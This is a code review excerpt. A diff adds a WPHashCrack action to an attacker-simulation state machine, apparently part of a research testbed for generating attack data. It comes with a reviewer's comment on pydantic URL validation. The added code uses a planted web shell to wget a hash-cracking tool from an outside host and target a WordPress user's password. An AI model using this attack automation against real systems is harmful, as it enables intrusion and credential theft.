src/cr_kyoushi/statemachines/aecid_attacker/actions.py

```diff
@@ -510,6 +511,124 @@ def __call__(
             log.error("No post to upload shell to")
 
 
+class WPHashCrack:
+    """Transition function uses WP hash cracker to find employee password."""
+
+    def __init__(
+        self,
+        hashcrack_url: str,
+        file_name: str,
+        wl_host: str,
+        attacked_user: str,
+        tar_download_name: str = None,
+        cmd_param: str = "wp_meta",
+        verify: bool = False,
+        timeout: Optional[float] = None,
+        sleep_time: Union[ApproximateFloat, float] = 3.0,
+    ):
+        """
+        Args:
+            hashcrack_url: url of the hashcrack tar.
+            file_name: name of the hashcrack tar.
+            wl_host: address of the host where wordlist is available.
+            attacked_user: the name of the WP user to crack the password.
+            tar_download_name: the name of the hashcrack tar after downloading.
+            cmd_param: the GET parameter to embed the command in.
+            verify: if HTTPS connection should very TLS certs.
+            timeout: the maximum time to wait for the web server to respond.
+            sleep_time: the waiting time between executed requests.
+        """
+        self.url = hashcrack_url
+        self.file_name = file_name
+        self.wl_host = wl_host
+        self.attacked_user = attacked_user
+        self.tar_download_name = tar_download_name
+        self.cmd_param = cmd_param
+        self.verify = verify
+        self.timeout = timeout
+        self.sleep_time = sleep_time
+
+    def __call__(
+        self,
+        log: BoundLogger,
+        current_state: str,
+        context: Context,
+        target: Optional[str],
+    ):
+        web_shell = context.web_shell
+        log = log.bind(
+            url=self.url,
+            wl_host=self.wl_host,
+            attacked_user=self.attacked_user,
+            web_shell=web_shell,
+        )
+        if web_shell is not None:
+            log.info("Downloading WPHashCrack")
+            archive_download_cmd = ["wget", self.url + self.file_name]
```

Comment:
if you combine it like this you must ensure that the url ends with a "/" you can do this by adding a custom validator to the config model.

Also note that since you now use HttpUrl self.url is an object of that type to just the get string url you will have to call str(self.url) you can also access specific parts from the url via the object (e.g., the scheme, path, etc.)
see https://pydantic-docs.helpmanual.io/usage/types/#url-properties

Note though that there seems to be an open bug that changing at least the path value does not reflect in the full url
https://github.com/samuelcolvin/pydantic/issues/1945

The same also holds for the word list url